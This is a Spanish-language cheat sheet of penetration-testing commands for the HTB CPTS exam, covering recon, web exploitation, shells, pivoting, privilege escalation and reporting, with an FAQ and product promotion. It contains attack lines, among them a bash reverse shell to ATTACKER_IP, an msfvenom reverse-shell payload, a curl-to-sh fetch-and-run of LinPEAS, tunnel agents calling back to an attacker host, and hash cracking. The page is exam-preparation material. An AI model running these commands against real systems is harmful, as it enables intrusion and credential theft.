Cheatsheet CPTS 2026

Los comandos y el flujo de trabajo del examen HTB Certified Penetration Testing Specialist — recopilación de información, análisis de vulnerabilidades, Active Directory, pivoting y el informe de nivel comercial que te certifica.

Actualizado:

Navegación rápida

01 Recopilación de información 02 Análisis de vulnerabilidades 03 Explotación Web 04 Shells y Payloads 05 Active Directory 06 Pivoting y Tunneling 07 Escalada de privilegios 08 Informe 09 Consejos del Examen

# Recopilación de información

La red CPTS es un entorno empresarial realista. Mapea toda la superficie externa e interna antes de tocar nada — una enumeración exhaustiva impulsa toda la cadena de ataque.

Escaneo de puertos y servicios

nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
Barrido TCP completo para descubrir todos los servicios abiertos
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET
Escaneo con scripts + detección de versión en los puertos descubiertos

Subdominios y OSINT

subfinder -d TARGET -silent | httpx -silent -title -tech-detect
Descubrimiento pasivo de subdominios + fingerprinting de hosts vivos
curl -s 'https://crt.sh/?q=%.TARGET&output=json' | jq -r '.[].name_value' | sort -u
Certificate transparency — revela subdominios de staging, dev e internos

Descubrimiento de contenido web

ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .php,.aspx,.txt -mc all -fc 404
Fuzzing de directorios / archivos con extensiones
ffuf -u http://TARGET -H "Host: FUZZ.TARGET" -w subdomains.txt -fs 0
Descubrimiento de virtual hosts (vhost) — común en las boxes web de la CPTS

Enumeración SMB y de dominio

netexec smb TARGET -u '' -p '' --shares
NetExec (sucesor de CrackMapExec) — enumera recursos con sesión nula
enum4linux-ng -A TARGET
Enumeración SMB/RPC completa — usuarios, grupos, recursos, política de contraseñas

# Análisis de vulnerabilidades

La CPTS espera una fase estructurada de análisis de vulnerabilidades: asocia cada servicio a sus debilidades conocidas antes de explotar, y documenta todo para el informe.

💡 Consejo CPTS: anota cada hallazgo con su severidad y CVSS sobre la marcha — el informe se califica, constrúyelo durante la evaluación, no al final.
nuclei -u https://TARGET -t cves/ -t misconfiguration/ -severity medium,high,critical
Escaneo por plantillas de CVE conocidos y malas configuraciones
nikto -h http://TARGET -C all
Malas configuraciones del servidor web y archivos por defecto peligrosos
searchsploit SERVICE VERSION
Asocia un servicio+versión identificado a exploits públicos
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-XXXX-XXXXX" | jq '.vulnerabilities[0].cve.metrics'
Obtén el vector CVSS oficial de NVD para citarlo en el informe

# Explotación Web

Las aplicaciones web son un punto de entrada frecuente en la CPTS. Inyección, subida de archivos, SSTI e inclusión abren la puerta a la red interna.

Inyección SQL

sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
SQLi automatizada desde una petición Burp — enumera las bases de datos

Template Injection (SSTI)

{{7*7}} ${7*7} #{7*7}
Sondas SSTI — un 49 devuelto = template injection del lado servidor → a menudo RCE

Inclusión de archivos

curl "http://TARGET/?page=php://filter/convert.base64-encode/resource=config"
Wrapper PHP filter — lee el código fuente en base64 para encontrar credenciales

Bypass de subida

cp shell.php shell.phar # probar .phtml, .php5, doble ext, magic bytes
Saltarse los filtros de extensión para subir un web shell

# Shells y Payloads

Consigue un punto de entrada estable y luego actualiza a un shell interactivo completo para la fase interna.

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell bash clásico
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm
Actualiza a un PTY, luego Ctrl+Z → stty raw -echo; fg para un TTY completo
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o s.exe
Binario reverse shell Windows x64

# Pivoting y Tunneling

La red CPTS está segmentada. Comprometerás un host en una subred y pivotarás más profundo — ligolo-ng y chisel son las herramientas de referencia.

Ligolo-ng (recomendado)

./proxy -selfcert # en Kali, luego: interface ip add 240.0.0.1/32 route
Inicia el proxy ligolo-ng y añade la interfaz/ruta del túnel
./agent -connect ATTACKER_IP:11601 -ignore-cert
En el host comprometido: se reconecta para alcanzar su subred interna

Chisel y SSH

./chisel server -p 8080 --reverse # cliente: ./chisel client ATTACKER_IP:8080 R:socks
Proxy SOCKS5 inverso a través de un host comprometido
proxychains4 netexec smb 10.10.0.0/24
Enumera la subred interna a través del proxy SOCKS

# Escalada de privilegios

La escalada local en hosts Linux y Windows reinyecta credenciales en el compromiso del dominio.

Linux

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinPEAS — destaca los vectores de privesc; verifica cada uno manualmente (GTFOBins)
sudo -l ; find / -perm -4000 -type f 2>/dev/null
Permisos sudo + binarios SUID — los dos vectores Linux más comunes

Windows

.\winPEASx64.exe ; whoami /priv
WinPEAS + privilegios del token — busca SeImpersonatePrivilege
.\GodPotato.exe -cmd "cmd /c whoami"
SeImpersonate → SYSTEM en Windows modernos

# Informe

La CPTS se califica con un informe de nivel comercial — ahí está la mayoría de los puntos. Estructúralo profesionalmente y haz que cada hallazgo sea reproducible.

💡 Consejo CPTS: HTB soporta oficialmente SysReptor, y los informes Markdown se importan limpiamente. Cada hallazgo necesita: descripción, impacto, hosts afectados, vector CVSS v3.1, pasos para reproducir, remediación y referencias.
# Resumen ejecutivo → Cadena de ataque → Hallazgos (CVSS + pasos) → Resumen de remediación
El esqueleto de informe CPTS de nivel comercial esperado por HTB
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt # documenta las creds crackeadas
Anota cómo se obtuvo cada credencial — la reproducibilidad se califica

# Consejos del Examen CPTS

Estrategia para los 10 días de examen más el informe. Es en el informe donde los candidatos pierden más puntos.

📝 El informe se califica, no solo los flags: redacta los hallazgos sobre la marcha. Un compromiso perfecto con un informe flojo puede suspender.
🏰 Piensa en cadenas de ataque: la CPTS premia el encadenamiento realista de pequeñas malas configuraciones, no los exploits aislados. Mapea con BloodHound.
🗺️ Domina el pivoting: la red está segmentada — practica ligolo-ng y proxychains hasta el automatismo.
⏱️ Aprovecha los 10 días: a diferencia de la OSCP, tienes tiempo. Enumera en profundidad, descansa y mantén notas limpias (marca de tiempo + capturas).
🔐 Aprende el abuso de AD CS: ESC1–ESC8 (certipy) es una vía rápida frecuente hacia Domain Admin en los AD modernos.

❓ Preguntas frecuentes CPTS

El examen HTB CPTS es una evaluación 100% práctica de 10 días contra una red Active Directory corporativa realista, seguida de tiempo para redactar un informe de nivel comercial. Debes alcanzar un número requerido de flags Y entregar un informe profesional — el informe es obligatorio y tiene un peso importante.

Su enfoque difiere. La CPTS tiene un componente de Active Directory y encadenamiento mucho más amplio y realista, y un fuerte énfasis en el informe profesional; la OSCP incluye máquinas independientes y una ventana más corta de 23h45. Muchos consideran la CPTS más amplia y orientada a empresa; la OSCP sigue siendo la referencia histórica.

Sí. La CPTS se califica con un informe de nivel comercial, no solo con flags. Debe incluir un resumen ejecutivo, un relato de la cadena de ataque, y hallazgos con severidad, CVSS, hosts afectados, pasos para reproducir y remediación. HTB soporta oficialmente SysReptor, y las herramientas Markdown se importan limpiamente.

nmap, ffuf/feroxbuster, nuclei, BloodHound/SharpHound, impacket (GetUserSPNs, secretsdump, psexec), certipy (AD CS ESC1–ESC8), evil-winrm, NetExec/CrackMapExec, ligolo-ng o chisel para el pivoting, y hashcat. Informe con SysReptor o el informe con IA de Pentest Mindmap.

El job path "Penetration Tester" de HTB Academy tiene unas 250+ horas y cubre todo el temario de la CPTS. La mayoría de los candidatos necesitan de 2 a 5 meses según su experiencia previa, con un fuerte enfoque en Active Directory, pivoting e informe.

Sí — de forma intensiva. La red del examen CPTS es un entorno AD corporativo. Domina el análisis de rutas con BloodHound, Kerberoasting, AS-REP roasting, abuso de AD CS (certipy ESC1–ESC8), NTLM relay, DCSync y movimiento lateral hasta Domain Admin.

No. A diferencia de la OSCP clásica, la CPTS no se centra en la explotación manual de buffer overflow. Enfatiza cadenas de ataque empresariales realistas, explotación web y de Active Directory, pivoting e informe profesional.

ESC1 es una mala configuración de Active Directory Certificate Services donde una plantilla vulnerable permite la autenticación de cliente y deja que el solicitante proporcione el sujeto. Con certipy puedes solicitar un certificado como Domain Admin y obtener un TGT — una vía rápida hacia el compromiso del dominio, común en los AD modernos evaluados en la CPTS.

Resumen ejecutivo (no técnico), alcance de la evaluación, un relato de la cadena de ataque realista, hallazgos detallados (descripción, impacto, hosts afectados, vector CVSS v3.1, pasos para reproducir, remediación, referencias) y un resumen de remediación priorizado. Mantenlo de nivel comercial y reproducible.

Sí — como acelerador de preparación. El mapa mental gratuito organiza 12.020+ comandos por los dominios de la CPTS, el Espacio Pentest ofrece una plantilla de informe CPTS dedicada, y el AI Wizard genera un informe estilo CPTS de nivel comercial. Acelera el aprendizaje de la metodología — respeta siempre las reglas de tu examen.

📚 Recursos relacionados

Informe CPTS asistido por IA

Convierte tus hallazgos en un informe CPTS de nivel comercial. El AI Wizard tiene un formato CPTS dedicado con cadena de ataque y hallazgos CVSS.

Probar gratis →

Prepara tu CPTS con 12.020+ comandos

Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea, una plantilla de informe CPTS y un generador de informes con IA.

Empezar gratis →
📎 ¿Te ha resultado útil esta cheatsheet?